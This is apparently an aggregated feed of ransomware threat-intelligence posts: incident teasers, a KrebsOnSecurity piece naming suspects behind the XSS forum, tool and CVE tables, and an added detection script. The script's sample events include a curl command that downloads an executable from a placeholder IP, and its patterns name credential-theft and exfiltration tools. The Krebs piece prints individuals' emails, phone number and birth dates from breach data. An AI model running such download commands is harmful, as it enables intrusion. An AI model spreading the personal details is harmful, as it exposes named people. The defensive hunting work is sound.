
Apache ActiveMQ Exploit Leads to LockBit Ransomware

Key Takeaways An audio version of this report can be found on Spotify, Apple, YouTube, Audible, & Amazon.  This intrusion began in mid-February 2024 after a threat actor exploited a vulnerability (CVE-2023-46604) on an exposed Apache ActiveMQ server. The threat actor was able to perform remote code execution (RCE) by using a Java Spring class and a custom Java Spring […]

The post Apache ActiveMQ Exploit Leads to LockBit Ransomware appeared first on The DFIR Report.

January 2026 Threat Trend Report on Ransomware

This report provides the number of affected systems confirmed during January 2026, DLS-based ransomware-related statistics, and notable ransomware issues in Korea and abroad. Below is a summary of some information.   The statistics on the number of ransomware samples and affected systems were based on the diagnostic names assigned by AhnLab, and the statistics on ransomware-affected […]

December 2025 Threat Trend Report on Ransomware

This report provides the number of affected systems confirmed during December 2025, DLS-based ransomware-related statistics, and notable ransomware issues in Korea and abroad. Below is a summary of some information.   The statistics on the number of ransomware samples and affected systems are based on the diagnostic names assigned by AhnLab. Please note that the […]

Who Got Arrested in the Raid on the XSS Crime Forum?

On July 22, 2025, the European police agency Europol said a long-running investigation led by the French Police resulted in the arrest of a 38-year-old administrator of XSS, a Russian-language cybercrime forum with more than 50,000 members. The action has triggered an ongoing frenzy of speculation and panic among XSS denizens about the identity of the unnamed suspect, but the consensus is that he is a pivotal figure in the crime forum scene who goes by the hacker handle “Toha.” Here’s a deep dive on what’s knowable about Toha, and a short stab at who got nabbed.

An unnamed 38-year-old man was arrested in Kiev last month on suspicion of administering the cybercrime forum XSS. Image: ssu.gov.ua.

Europol did not name the accused, but published partially obscured photos of him from the raid on his residence in Kiev. The police agency said the suspect acted as a trusted third party — arbitrating disputes between criminals — and guaranteeing the security of transactions on XSS. A statement from Ukraine’s SBU security service said XSS counted among its members many cybercriminals from various ransomware groups, including REvil, LockBit, Conti, and Qilin.

Since the Europol announcement, the XSS forum resurfaced at a new address on the deep web (reachable only via the anonymity network Tor). But from reviewing the recent posts, there appears to be little consensus among longtime members about the identity of the now-detained XSS administrator.

The most frequent comment regarding the arrest was a message of solidarity and support for Toha, the handle chosen by the longtime administrator of XSS and several other major Russian forums. Toha’s accounts on other forums have been silent since the raid.

Europol said the suspect has enjoyed a nearly 20-year career in cybercrime, which roughly lines up with Toha’s history. In 2005, Toha was a founding member of the Russian-speaking forum Hack-All. That is, until it got massively hacked a few months after its debut. In 2006, Toha rebranded the forum to exploit[.]in, which would go on to draw tens of thousands of members, including an eventual Who’s-Who of wanted cybercriminals.

Toha announced in 2018 that he was selling the Exploit forum, prompting rampant speculation on the forums that the buyer was secretly a Russian or Ukrainian government entity or front person. However, those suspicions were unsupported by evidence, and Toha vehemently denied the forum had been given over to authorities.

One of the oldest Russian-language cybercrime forums was DaMaGeLaB, which operated from 2004 to 2017, when its administrator “Ar3s” was arrested. In 2018, a partial backup of the DaMaGeLaB forum was reincarnated as xss[.]is, with Toha as its stated administrator.

CROSS-SITE GRIFTING

Clues about Toha’s early presence on the Internet — from ~2004 to 2010 — are available in the archives of Intel 471, a cyber intelligence firm that tracks forum activity. Intel 471 shows Toha used the same email address across multiple forum accounts, including at Exploit, Antichat, Carder[.]su and inattack[.]ru.

DomainTools.com finds Toha’s email address — toschka2003@yandex.ru — was used to register at least a dozen domain names — most of them from the mid- to late 2000s. Apart from exploit[.]in and a domain called ixyq[.]com, the other domains registered to that email address end in .ua, the top-level domain for Ukraine (e.g. deleted.org[.]ua, lj.com[.]ua, and blogspot.org[.]ua).

A 2008 snapshot of a domain registered to toschka2003@yandex.ru and to Anton Medvedovsky in Kiev. Note the message at the bottom left, “Protected by Exploit,in.” Image: archive.org.

Nearly all of the domains registered to toschka2003@yandex.ru contain the name Anton Medvedovskiy in the registration records, except for the aforementioned ixyq[.]com, which is registered to the name Yuriy Avdeev in Moscow.

This Avdeev surname came up in a lengthy conversation with Lockbitsupp, the leader of the rapacious and destructive ransomware affiliate group Lockbit. The conversation took place in February 2024, when Lockbitsupp asked for help identifying Toha’s real-life identity.

In early 2024, the leader of the Lockbit ransomware group — Lockbitsupp — asked for help investigating the identity of the XSS administrator Toha, which he claimed was a Russian man named Anton Avdeev.

Lockbitsupp didn’t share why he wanted Toha’s details, but he maintained that Toha’s real name was Anton Avdeev. I declined to help Lockbitsupp in whatever revenge he was planning on Toha, but his question made me curious to look deeper.

It appears Lockbitsupp’s query was based on a now-deleted Twitter post from 2022, when a user by the name “3xp0rt” asserted that Toha was a Russian man named Anton Viktorovich Avdeev, born October 27, 1983.

Searching the web for Toha’s email address toschka2003@yandex.ru reveals a 2010 sales thread on the forum bmwclub.ru where a user named Honeypo was selling a 2007 BMW X5. The ad listed the contact person as Anton Avdeev and gave the contact phone number 9588693.

A search on the phone number 9588693 in the breach tracking service Constella Intelligence finds plenty of official Russian government records with this number, date of birth and the name Anton Viktorovich Avdeev. For example, hacked Russian government records show this person has a Russian tax ID and SIN (Social Security number), and that they were flagged for traffic violations on several occasions by Moscow police: in 2004, 2006, 2009, and 2014.

Astute readers may have noticed by now that the ages of Mr. Avdeev (41) and the XSS admin arrested this month (38) are a bit off. This would seem to suggest that the person arrested is someone other than Mr. Avdeev, who did not respond to requests for comment.

A FLY ON THE WALL

For further insight on this question, KrebsOnSecurity sought comments from Sergeii Vovnenko, a former cybercriminal from Ukraine who now works at the security startup paranoidlab.com. I reached out to Vovnenko because for several years beginning around 2010 he was the owner and operator of thesecure[.]biz, an encrypted “Jabber” instant messaging server that Europol said was operated by the suspect arrested in Kiev. Thesecure[.]biz grew quite popular among many of the top Russian-speaking cybercriminals because it scrupulously kept few records of its users’ activity, and its administrator was always a trusted member of the community.

The reason I know this historic tidbit is that in 2013, Vovnenko — using the hacker nicknames “Fly,” and “Flycracker” — hatched a plan to have a gram of heroin purchased off of the Silk Road darknet market and shipped to our home in Northern Virginia. The scheme was to spoof a call from one of our neighbors to the local police, saying this guy Krebs down the street was a druggie who was having narcotics delivered to his home.

I happened to be lurking on Flycracker’s private cybercrime forum when his heroin-framing plan was carried out, and called the police myself before the smack eventually arrived in the U.S. Mail. Vovnenko was later arrested for unrelated cybercrime activities, extradited to the United States, convicted, and deported after a 16-month stay in the U.S. prison system [on several occasions, he has expressed heartfelt apologies for the incident, and we have since buried the hatchet].

Vovnenko said he purchased a device for cloning credit cards from Toha in 2009, and that Toha shipped the item from Russia. Vovnenko explained that he (Flycracker) was the owner and operator of thesecure[.]biz from 2010 until his arrest in 2014.

Vovnenko believes thesecure[.]biz was stolen while he was in jail, either by Toha and/or an XSS administrator who went by the nicknames N0klos and Sonic.

“When I was in jail, [the] admin of xss.is stole that domain, or probably N0klos bought XSS from Toha or vice versa,” Vovnenko said of the Jabber domain. “Nobody from [the forums] spoke with me after my jailtime, so I can only guess what really happened.”

N0klos was the owner and administrator of an early Russian-language cybercrime forum known as Darklife[.]ws. However, N0klos also appears to be a lifelong Russian resident, and in any case seems to have vanished from Russian cybercrime forums several years ago.

Asked whether he believes Toha was the XSS administrator who was arrested this month in Ukraine, Vovnenko maintained that Toha is Russian, and that “the French cops took the wrong guy.”

WHO IS TOHA?

So who did the Ukrainian police arrest in response to the investigation by the French authorities? It seems plausible that the BMW ad invoking Toha’s email address and the name and phone number of a Russian citizen was simply misdirection on Toha’s part — intended to confuse and throw off investigators. Perhaps this even explains the Avdeev surname surfacing in the registration records from one of Toha’s domains.

But sometimes the simplest answer is the correct one. “Toha” is a common Slavic nickname for someone with the first name “Anton,” and that matches the name in the registration records for more than a dozen domains tied to Toha’s toschka2003@yandex.ru email address: Anton Medvedovskiy.

Constella Intelligence finds there is an Anton Gannadievich Medvedovskiy living in Kiev who will be 38 years old in December. This individual owns the email address itsmail@i.ua, as well as an Airbnb account featuring a profile photo of a man with roughly the same hairline as the suspect in the blurred photos released by the Ukrainian police. Mr. Medvedovskiy did not respond to a request for comment.

My take on the takedown is that the Ukrainian authorities likely arrested Medvedovskiy. Toha shared on DaMaGeLab in 2005 that he had recently finished the 11th grade and was studying at a university — a time when Medvedovskiy would have been around 18 years old. On Dec. 11, 2006, fellow Exploit members wished Toha a happy birthday. Records exposed in a 2022 hack at the Ukrainian public services portal diia.gov.ua show that Mr. Medvedovskiy’s birthday is Dec. 11, 1987.

The law enforcement action and resulting confusion about the identity of the detained has thrown the Russian cybercrime forum scene into disarray in recent weeks, with lengthy and heated arguments about XSS’s future spooling out across the forums.

XSS relaunched on a new Tor address shortly after the authorities plastered their seizure notice on the forum’s homepage, but all of the trusted moderators from the old forum were dismissed without explanation. Existing members saw their forum account balances drop to zero, and were asked to plunk down a deposit to register at the new forum. The new XSS “admin” said they were in contact with the previous owners and that the changes were to help rebuild security and trust within the community.

However, the new admin’s assurances appear to have done little to assuage the worst fears of the forum’s erstwhile members, most of whom seem to be keeping their distance from the relaunched site for now.

Indeed, if there is one common understanding amid all of these discussions about the seizure of XSS, it is that Ukrainian and French authorities now have several years worth of private messages between XSS forum users, as well as contact rosters and other user data linked to the seized Jabber server.

“The myth of the ‘trusted person’ is shattered,” the user “GordonBellford” cautioned on Aug. 3 in an Exploit forum thread about the XSS admin arrest. “The forum is run by strangers. They got everything. Two years of Jabber server logs. Full backup and forum database.”

GordonBellford continued:

And the scariest thing is: this data array is not just an archive. It is material for analysis that has ALREADY BEEN DONE. With the help of modern tools, they see everything:

Graphs of your contacts and activity.
Relationships between nicknames, emails, password hashes and Jabber ID.
Timestamps, IP addresses and digital fingerprints.
Your unique writing style, phraseology, punctuation, consistency of grammatical errors, and even typical typos that will link your accounts on different platforms.

They are not looking for a needle in a haystack. They simply sifted the haystack through the AI sieve and got ready-made dossiers.

Ransomware Tool Matrix Project Updates: May 2025

Introduction

This blog is a summary and analysis of recent additions to the Ransomware Tool Matrix (RTM) as well as the Ransomware Vulnerability Matrix (RVM). Feedback from the infosec community about these projects has been overwhelmingly positive, and many researchers have contacted me to tell me how helpful they have found them. It makes me happy to hear that something I do in my spare time can help stop ransomware attacks and cybercriminals from exploiting our society’s systems, and for that reason I shall continue to maintain these projects as long as ransomware is still around. For anyone new to these projects, please read the descriptions on GitHub or watch my talk explaining the project at BSides London.

Background on the current ransomware ecosystem as of May 2025

Following the impact of Operation Cronos against LockBit and the exit scam by ALPHV/BlackCat, the ransomware ecosystem has been even more unstable than usual. The exit scams and law enforcement infiltration operations have created a zero trust environment for the cybercriminals participating in the ransomware economy. The days of affiliates putting their faith in one RaaS platform seem to be long gone and many are experimenting and going from one RaaS to the next.

Sources of Threat Intelligence for the RTM

The RTM was updated with OSINT reports shared by cybersecurity researchers at various private service providers or vendors. The thing to remember about these reports is that the tool usage is going to be slightly outdated due to the time it takes incident response teams to wrap up an investigation, compile findings, and publish a report.

From the reports, threat groups such as Qilin, BlackSuit, RansomEXX, Medusa, BianLian, Hunters International and PLAY have been active for over one year or for multiple years. These are established groups. Since RansomHub and LockBit have shut down, it is more likely than not that the affiliates have already shifted to one of the other RaaS platforms, like Qilin, among others.

There has also been a number of ransomware operations suspected to be linked to Chinese cyber-espionage groups, such as RA World (for using PlugX), NailaoLocker (for using ShadowPad and PlugX), and CrazyHunter (for its focus on Taiwan).

Threat groups such as IMN Crew, QWCrypt (linked to RedCurl), NightSpire, SuperBlack, and Helldown are all rising threat groups that have more recently begun their ransomware campaigns.

These factors have led to a large variety of tool usage being observed in ransomware operations across the landscape. The reliance on tools from GitHub and other free software sites, however, remains a constant theme across all of these ransomware operations.

List of sources used for the May 2025 major update to the RTM:

Group Name | Report Publish Date | URL
Qilin | 25 April 2025 | redpiranha.net
Qilin | 10 March 2025 | picussecurity.com
IMN Crew | 24 April 2025 | s-rminform.com
CrazyHunter | 16 April 2025 | trendmicro.com
RansomEXX | 8 April 2025 | microsoft.com
BlackSuit | 31 March 2025 | thedfirreport.com
QWCrypt | 26 March 2025 | bitdefender.com
RansomHub | 26 March 2025 | welivesecurity.com
RansomHub | 20 March 2025 | security.com
Medusa | 26 March 2025 | welivesecurity.com
Medusa | 6 March 2025 | security.com
BianLian | 26 March 2025 | welivesecurity.com
PLAY | 26 March 2025 | welivesecurity.com
NightSpire | 25 March 2025 | s-rminform.com
Hunters International | 19 March 2025 | esentire.com
SuperBlack | 13 March 2025 | forescout.com
LockBit | 24 February 2025 | thedfirreport.com
NailaoLocker | 20 February 2025 | orangecyberdefense.com
NailaoLocker | 18 February 2025 | trendmicro.com
RA World | 13 February 2025 | security.com
RA World | 22 July 2024 | unit42.paloaltonetworks.com
Helldown | 7 November 2024 | truesec.com

Tools Used by Multiple Groups

  • EDRSandBlast and WKTools are relatively new tools that are being used by multiple groups to deactivate and overcome EDR tools that many victims will have on their networks to prevent ransomware attacks.
  • Typical ransomware tools, such as PsExec, Mimikatz, and Rclone, remain effective and will likely stay in use by multiple ransomware gangs for the foreseeable future.

Tool | Type | Groups Using It
WinSCP | Exfiltration | NightSpire, Hunters International
Mimikatz | Credential Theft | RansomHub, Qilin, Helldown
Impacket | Offensive Security Tool | RansomHub, RA World, NailaoLocker
Rclone | Exfiltration | RansomHub, Hunters International, Medusa
NetScan | Discovery | RansomHub, Medusa
WKTools | Discovery | RansomHub, BianLian, PLAY
Advanced IP Scanner | Discovery | Hunters International, BianLian
Advanced Port Scanner | Discovery | Hunters International, Helldown
AnyDesk | RMM Tool | Medusa, BianLian
EDRSandBlast | Defense Evasion | Medusa, Qilin

New Tools Added to the RTM

  • The most notable new tools added to RTM include several defense evasion tools for deactivating EDRs, discovery for sensitive files, and tunnelling tools to conceal adversary network connections.

Tool | Type | Group Usage
Bublup | Exfiltration | BlackSuit
WKTools | Discovery | BianLian, PLAY
AmmyyAdmin | RMM Tool | BianLian
CQHashDump | Credential Theft | NailaoLocker
Throttle Stop Driver | Defense Evasion | Medusa
KillAV | Defense Evasion | Medusa
BadRentdrv2 | Defense Evasion | RansomHub
Toshiba Power Driver (BYOVD) | Defense Evasion | Qilin
ZammoCide | Defense Evasion | CrazyHunter
FRP | Networking | Medusa
Stowaway | Networking | RansomHub
Navicat | Discovery | Medusa
Everything.exe | Discovery | NightSpire
RoboCopy | Discovery | Medusa
NPS | Networking | RA World
SharpGPOAbuse | Offensive Security Tool | CrazyHunter
Attrib | LOLBAS | BlackSuit
Curl | LOLBAS | QWCrypt (RedCurl)
PCA Utility (pcalua) | LOLBAS | QWCrypt (RedCurl)

Exploits used by Ransomware Gangs added to the RVM

  • As is now usual, multiple ransomware groups have been targeting Fortinet networking devices for initial access into victim environments.
  • Multiple ransomware groups continue to exploit the Windows Common Log File System (CLFS) for local privilege escalation to run hacking tools and steal credentials.
  • Other exploits involve targeting edge devices, such as Check Point VPNs or PAN Firewalls, or exposed servers, such as Atlassian Confluence Data Center Servers.
  • The targeting of Veeam backup software should come as no surprise as preventing backups or stealing sensitive files, such as Active Directory backups, are key objectives of ransomware gangs to complete their mission.

Ransomware Group | Exploited CVEs
NightSpire | CVE-2024-55591 (FortiOS)
RansomHub | CVE-2022-24521 (Windows CLFS), CVE-2023-27532 (Veeam)
LockBit | CVE-2023-22527 (Confluence)
Hunters International | CVE-2024-55591 (FortiProxy)
SuperBlack | CVE-2024-55591 (FortiProxy)
RA World | CVE-2024-0012 (PAN-OS)
NailaoLocker | CVE-2024-24919 (Check Point VPN)
RansomEXX | CVE-2025-29824 (Windows CLFS)


Conclusion

My recommendation for defenders who continue the fight against ransomware is to take some of the findings from this report and begin threat hunting, writing detection rules, and blocking those of these tools that have no legitimate presence in the environments you are protecting.
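As an added example of turning the RTM tables above into a hunt (my code, not part of the RTM project), the script below matches constructed process-creation events against a subset of the tools listed in this post, counts LOLBAS binaries only when an assumed abuse indicator is present, and scores each host by how many distinct RTM tool types (attack phases) it shows. The image-name patterns, the LOLBAS abuse heuristics and the sample events are all assumptions made for this example.

```python
"""Name-based hunt over process-creation events for tools listed in the RTM tables above.

Sample events are constructed for this example; they are not real telemetry.
"""
import re
from dataclasses import dataclass

# Tool -> (RTM type, groups observed using it), transcribed from the tables in this post.
RTM_TOOLS = {
    "mimikatz": ("Credential Theft", ["RansomHub", "Qilin", "Helldown"]),
    "rclone": ("Exfiltration", ["RansomHub", "Hunters International", "Medusa"]),
    "winscp": ("Exfiltration", ["NightSpire", "Hunters International"]),
    "edrsandblast": ("Defense Evasion", ["Medusa", "Qilin"]),
    "anydesk": ("RMM Tool", ["Medusa", "BianLian"]),
    "curl": ("LOLBAS", ["QWCrypt (RedCurl)"]),
    "attrib": ("LOLBAS", ["BlackSuit"]),
    "pcalua": ("LOLBAS", ["QWCrypt (RedCurl)"]),
}

# Image-name / command-line patterns per tool. These are assumptions made for this
# example: operators rename binaries, so pair name hunts with hash- or import-based rules.
TOOL_PATTERNS = {
    "mimikatz": r"mimikatz",
    "rclone": r"\brclone\b",
    "winscp": r"winscp",
    "edrsandblast": r"edrsandblast",
    "anydesk": r"anydesk",
    "curl": r"^curl(\.exe)?$",
    "attrib": r"^attrib(\.exe)?$",
    "pcalua": r"^pcalua(\.exe)?$",
}

# LOLBAS binaries exist on every Windows host, so they count only together with an abuse
# indicator (assumed heuristics: curl pulling a URL, attrib hiding files, pcalua -a).
LOLBAS_ABUSE = {
    "curl": r"https?://",
    "attrib": r"\+[hs]",
    "pcalua": r"(^|\s)-a\s",
}


@dataclass(frozen=True)
class Event:
    host: str
    time: str
    image: str  # full path of the created process
    cmdline: str


@dataclass(frozen=True)
class Hit:
    host: str
    time: str
    tool: str
    rtm_type: str
    groups: tuple


def _basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def match_tools(event: Event) -> list:
    """Return the RTM tools an event matches; LOLBAS only when the abuse indicator is present."""
    base = _basename(event.image)
    haystack = f"{base} {event.cmdline.lower()}"
    tools = []
    for tool, pattern in TOOL_PATTERNS.items():
        if RTM_TOOLS[tool][0] == "LOLBAS":
            if re.search(pattern, base) and re.search(LOLBAS_ABUSE[tool], event.cmdline, re.I):
                tools.append(tool)
        elif re.search(pattern, haystack):
            tools.append(tool)
    return tools


def hunt(events) -> list:
    """Run every event through match_tools and attach the RTM type and group context."""
    return [Hit(e.host, e.time, t, RTM_TOOLS[t][0], tuple(RTM_TOOLS[t][1]))
            for e in events for t in match_tools(e)]


def score_hosts(hits) -> dict:
    """Severity per host: two or more distinct non-LOLBAS RTM types (attack phases) is
    'high', one is 'medium', LOLBAS abuse alone is 'low'."""
    phases = {}
    for h in hits:
        phases.setdefault(h.host, set())
        if h.rtm_type != "LOLBAS":
            phases[h.host].add(h.rtm_type)
    return {host: "high" if len(p) >= 2 else "medium" if p else "low"
            for host, p in phases.items()}


# Constructed sample events (not real telemetry). SRV01 shows a curl download, a renamed
# binary that a name-based hunt misses, then credential-theft and exfiltration tooling.
SAMPLE_EVENTS = [
    Event("SRV01", "2025-05-02T01:10Z", r"C:\Windows\System32\attrib.exe", r"attrib -r C:\temp\n.txt"),
    Event("SRV01", "2025-05-02T01:12Z", r"C:\Windows\System32\curl.exe",
          r"curl.exe -o C:\ProgramData\a.exe http://198.51.100.7/a.exe"),
    Event("SRV01", "2025-05-02T01:20Z", r"C:\ProgramData\svc.exe", "svc.exe --quiet"),
    Event("SRV01", "2025-05-02T01:25Z", r"C:\Users\Public\mimikatz.exe", "mimikatz.exe"),
    Event("SRV01", "2025-05-02T02:00Z", r"C:\Users\Public\rclone.exe", r"rclone.exe copy D:\Finance remote:bk"),
    Event("WS07", "2025-05-02T09:00Z", r"C:\Program Files\AnyDesk\AnyDesk.exe", "AnyDesk.exe --service"),
]

if __name__ == "__main__":
    found = hunt(SAMPLE_EVENTS)
    for h in found:
        print(f"{h.host} {h.time} {h.tool:<10} {h.rtm_type:<18} seen with: {', '.join(h.groups)}")
    print(score_hosts(found))
```

Sanctioned RMM tools such as AnyDesk should be allowlisted per host before this score is acted on, and the renamed-binary miss on SRV01 is the reason to add hash or behavioural rules alongside name matching.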

Here are a few sites to help you get started:

Confluence Exploit Leads to LockBit Ransomware

Key Takeaways Case Summary The intrusion started with the exploitation of CVE-2023-22527, a critical remote code execution vulnerability in Confluence, against a Windows server. The first indication of threat actor activity was the execution of system discovery commands, including net user and whoami. Shortly after, the threat actor attempted to download AnyDesk via curl, but […]

The post Confluence Exploit Leads to LockBit Ransomware appeared first on The DFIR Report.

Analysis of Counter-Ransomware Activities in 2024

The scourge of ransomware continues primarily because of three main reasons: Ransomware-as-a-Service (RaaS), cryptocurrency, and safe havens.

  • RaaS platforms enable aspiring cybercriminals to join a gang and begin launching attacks with a support system that helps extract ransom payments from their victims.
  • Cryptocurrency enables cybercriminals to receive funds from victims around the world without the option to freeze or refund them due to the immutable nature of the virtual funds.
  • Safe havens are countries that permit cybercriminals to launch attacks without immediate fear of arrest, enabling them to earn vast fortunes through ransomware campaigns.

With these three challenges in mind, law enforcement and governments have a very difficult job to do when it comes to fighting ransomware but fight it they must. In this blog we shall recall what counter-ransomware activities took place in 2024, analyse their effectiveness, and assess how the landscape shall evolve as a result.

A podcast version of this blog is also available here.

Ransomware Operator Arrests and Sanctions

During 2024, there were significant disruption operations by law enforcement and financial authorities targeting individuals behind ransomware campaigns (see the Table below). The main focus of 2024 for Western law enforcement was squarely on the LockBit RaaS and its affiliates as it was the largest and highest earning ransomware operation to date.

Several key players of the ransomware ecosystem were arrested, including the main developer of LockBit ransomware. Interestingly, Russian law enforcement also decided to arrest ransomware threat actors located in Moscow and Kaliningrad as well.

Law Enforcement Activity

Month | Group(s) | Law Enforcement Activity
February 2024 | SugarLocker, REvil | Russian authorities have identified and arrested three alleged members in Moscow of a ransomware gang called SugarLocker.
February 2024 | LockBit | The LockBit leak site was seized. Two LockBit affiliates were arrested in Poland and Ukraine. Up to 28 servers belonging to LockBit were taken down.
February 2024 | LockBit | Two Russian nationals, Ivan Kondratiev and Artur Sungatov, were sanctioned by the US Treasury for being affiliates of LockBit, among other RaaS.
May 2024 | LockBit | Dmitry Khoroshev, the administrator and developer of LockBit, was sanctioned by the US Treasury.
May 2024 | IcedID, SystemBC, Pikabot, Smokeloader, Bumblebee, TrickBot | European police took down malicious spam botnets that support ransomware campaigns. This resulted in 4 arrests (1 in Armenia and 3 in Ukraine), over 100 servers and 2,000 domains being seized. One of the main suspects earned €69 million by renting out infrastructure sites to deploy ransomware.
June 2024 | Conti, LockBit | A Ukrainian national was arrested for supporting Conti and LockBit ransomware attacks as a crypter developer.
August 2024 | Reveton, RansomCartel | Maksim Silnikau, a Belarusian national, was arrested in Spain for running Reveton and RansomCartel.
August 2024 | Karakurt, Conti | Deniss Zolotarjovs, a Latvian national, was arrested and extradited to the US from Georgia for running the Karakurt data extortion gang linked to Conti.
October 2024 | Evil Corp, LockBit | The UK, alongside the US and Australia, has sanctioned 16 members of Evil Corp, including Aleksandr Ryzhenkov, Viktor Yakubets, and Eduard Benderskiy.
November 2024 | Phobos | Evgenii Ptitsyn, a Russian national, was arrested and extradited to the US from South Korea for running the Phobos ransomware gang.
December 2024 | LockBit | Rostislav Panev, a dual Russian and Israeli national, was arrested in Israel for developing LockBit ransomware.
December 2024 | LockBit, Babuk, Hive | Mikhail “Wazawaka” Matveev was arrested in Russia for violating domestic laws against the creation and use of malware. He was fined and had his cryptocurrency seized and is awaiting trial.

The ransomware ecosystem has fragmented due to the law enforcement disruptions of the largest players, such as ALPHV/BlackCat and LockBit. In the case of ALPHV/BlackCat, the operators staged a law enforcement takedown as they put up a fake seizure notice as part of an exit scam in March 2024 after the attack on UnitedHealth.

Following these disruptions, some affiliates have migrated to less effective strains or launched their own strains. This includes Akira and RansomHub at the top of the list as well as Hunters International and PLAY.

Cryptocurrency Exchanges Disrupted

During 2024, law enforcement seized funds from and sanctioned a number of cryptocurrency exchanges and individuals running payment processors using cryptocurrency (see the Table below).

One of the most interesting disclosures this year came from the UK National Crime Agency (NCA) around Operation Destabilise. The NCA linked payments to ransomware gangs to money laundering networks used by Russian oligarchs to covertly purchase property and by Russia Today, the state-run media organization, to covertly fund pro-Russia foreign entities.

Another notable investigation in 2024 was when the US Treasury sanctioned more Russian cryptocurrency exchanges, such as PM2BTC and Cryptex, that led to money launderers that facilitate the cashing out of ransom payments being arrested by Russian law enforcement.

Law Enforcement Activity

Month | Exchange(s) | Law Enforcement Activity
August 2024 | Cryptonator | The US Justice Department indicted Russian national Roman Pikulev and Cryptonator, which processed a total of $1.4 billion in transactions, of which $8 million were ransom payments. Cryptonator also has ties to other sanctioned entities including Blender, Hydra Market, Bitzlato, and Garantex, among others.
September 2024 | PM2BTC, Cryptex, UAPS | FinCEN identified PM2BTC as being of “primary money laundering concern” in connection with Russian illicit finance. This was alongside Cryptex and Sergey Sergeevich Ivanov, a Russian national, who is associated with UAPS and PinPays, as well as Genesis Market. Cryptex also facilitated more than $115 million of proceeds from ransomware payments.
September 2024 | 47 exchanges | In Operation Final Exchange, German federal police (BKA) shut down 47 cryptocurrency exchange services used by ransomware gangs that operated without requiring registration or identity verification.
October 2024 | Cryptex, UAPS | Russian authorities have arrested nearly 100 suspected cybercriminals linked to the anonymous payment system UAPS and the cryptocurrency exchange Cryptex.
November 2024 | Smart, TGR Group | The NCA uncovered a Russian money-laundering network operated by two companies called Smart and TGR Group as part of Operation Destabilise that involved UK-based cash-to-crypto networks that laundered Ryuk ransom payments as well as the money of Russian oligarchs and Russia Today.

Safe Havens Enabling Ransomware

While ransomware is a global problem, there are only a few countries that are to blame for this rapid expansion of the ransomware ecosystem. The state that is blamed the most for preventing many ransomware operators from facing justice is Russia. There are explicit rules posted to Russian-speaking cybercrime forums that state as long as members avoid targeting Russia and the Commonwealth of Independent States (CIS), they are free to operate.

The Russian ransomware safe haven theory was further proven following sanctions levied against Evil Corp by the UK, US, and Australia. One of the sanctioned men connected to Evil Corp was Eduard Benderskiy, a former Russian federal security service (FSB) official. Benderskiy is reportedly the father-in-law of Maksim Yakubets, the leader of Evil Corp, an organized cybercrime group responsible for multiple ransomware strains including BitPaymer, WastedLocker, Hades, PhoenixLocker, and MacawLocker. In total, Evil Corp has reportedly extorted at least $300 million from victims globally, according to the UK NCA. It is now clear that Evil Corp has protection from a highly connected Russian FSB official who has also been involved in multiple overseas assassinations on behalf of the Kremlin, according to Bellingcat investigators.

While a number of ransomware operators were arrested in 2024 and some were extradited to the US, the work done by law enforcement specializing in cybercrime was put in the spotlight during the August 2024 prisoner swap. Multiple countries decided to release cybercriminals, spies and an assassin as part of a historic prisoner exchange with Russia at an airport in Ankara, Turkey. The US negotiated the release of 16 people from Russia, including five Germans as well as seven Russian citizens who were political prisoners in their own country.

Notably, from a cybercrime intelligence perspective, the Russian nationals released from the West included the infamous cybercriminals Roman Seleznev and Vladislav Klyushin. The latter, Klyushin, was sentenced in 2023 to nine years in US prison after he was caught in a $93 million stock market cheating scheme that involved hacking into US companies for insider knowledge. The other cybercriminal, Seleznev, was sentenced to 27 years in prison in 2017 for stealing and selling millions of credit card numbers from 500 businesses using point-of-sale (POS) malware and causing more than $169 million in damage to small businesses and financial institutions, including those in the US.

In 2024, we saw several more Russian nationals get extradited to the US after being arrested by law enforcement in the country they were residing in. This includes the Phobos operator living in South Korea and the LockBit developer living in Israel. This follows others arrested in previous years such as a TrickBot developer arrested in South Korea as well as the two LockBit affiliates extradited to the US. There is a potential that these Russian nationals involved in ransomware could be used in prisoner exchanges in the future.

Further, another curious trend in 2024 was that some Russians inside Russia, which is firmly considered a safe haven for ransomware gangs, did get arrested. This includes the SugarLocker operators arrested in Moscow and the LockBit affiliate Wazawaka, who was arrested in Kaliningrad. This is alongside the money launderers arrested around Russia linked to the Cryptex exchange.

The arrests of Russian nationals in Russia for ransomware activities appear to be more symbolic than a true crackdown on this type of activity. This is because there are several dozen Russian-speaking ransomware gangs that continue to operate, as well as a plethora of other types of cybercrime in the Russian-speaking underground.

Outlook

In 2024, there was lots of significant action by law enforcement to shake up the ransomware economy. One of the main successes of the notable Operation Cronos action taken against LockBit was the sowing of distrust and disharmony in the ransomware ecosystem. Despite the admins of LockBit trying to recover, their reputation and army of affiliates have been smashed.

Many of the Russian law enforcement activities could be related to the costs of the Russian invasion of Ukraine. Russian authorities seizing the funds of illicit cryptocurrency exchanges could be a way to pay for the war in Ukraine, and they could be recruiting the arrested cybercriminals for offensive cyber operations related to the war. The true motivations of Russian law enforcement in arresting these specific ransomware operators while allowing others to operate are unclear. The cybercriminals could also simply have not paid their protection money or lack the connections in the FSB that Evil Corp has.

Due to the fall of LockBit and ALPHV/BlackCat in 2024, there has been a rise of other ransomware groups like RansomHub and Akira to fill the vacuum. However, the rate of attacks by these emerging groups is still noticeably lower than when LockBit was operating at full force. This should be perceived as a success for law enforcement operations in 2024 due to the overall number of ransomware attacks lowering, which we should all be thankful for.
